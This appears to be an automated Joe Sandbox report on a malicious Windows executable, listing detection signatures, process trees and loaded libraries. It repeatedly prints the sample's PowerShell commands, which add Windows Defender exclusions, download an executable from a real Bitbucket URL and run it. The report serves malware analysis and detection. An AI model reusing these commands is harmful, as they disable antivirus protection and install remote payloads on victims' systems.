Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gq48hjKhZf.exe

Overview

General Information

Sample name:Gq48hjKhZf.exe
renamed because original name is a hash value
Original sample name:454bf064c19d363b154a419fc69dc693.exe
Analysis ID:1580296
MD5:454bf064c19d363b154a419fc69dc693
SHA1:98beb972b52d32c846e9e485cbf17e9211cbe5ab
SHA256:6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
Tags:exeuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Gq48hjKhZf.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 454BF064C19D363B154A419FC69DC693)
    • cmd.exe (PID: 7624 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7676 cmdline: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7872 cmdline: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')"; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7984 cmdline: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8108 cmdline: cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Gq48hjKhZf.exe PID: 7572JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      SourceRuleDescriptionAuthorStrings
      amsi64_7872.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Gq48hjKhZf.exeVirustotal: Detection: 55%Perma Link
        Source: Gq48hjKhZf.exeReversingLabs: Detection: 39%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: Gq48hjKhZf.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\Jump to behavior
        Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: Gq48hjKhZf.exe, 00000000.00000003.1780751505.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, 9A85.bat.0.drString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400138E50_2_00000001400138E5
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400154F00_2_00000001400154F0
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400151600_2_0000000140015160
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400151700_2_0000000140015170
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400131750_2_0000000140013175
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400102100_2_0000000140010210
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400162100_2_0000000140016210
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014001366E0_2_000000014001366E
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000B7580_2_000000014000B758
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_0000000140012FDD0_2_0000000140012FDD
        Source: classification engineClassification label: mal88.evad.winEXE@12/12@1/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile created: C:\Users\user\AppData\Local\Temp\9A83.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Gq48hjKhZf.exeVirustotal: Detection: 55%
        Source: Gq48hjKhZf.exeReversingLabs: Detection: 39%
        Source: unknownProcess created: C:\Users\user\Desktop\Gq48hjKhZf.exe "C:\Users\user\Desktop\Gq48hjKhZf.exe"
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
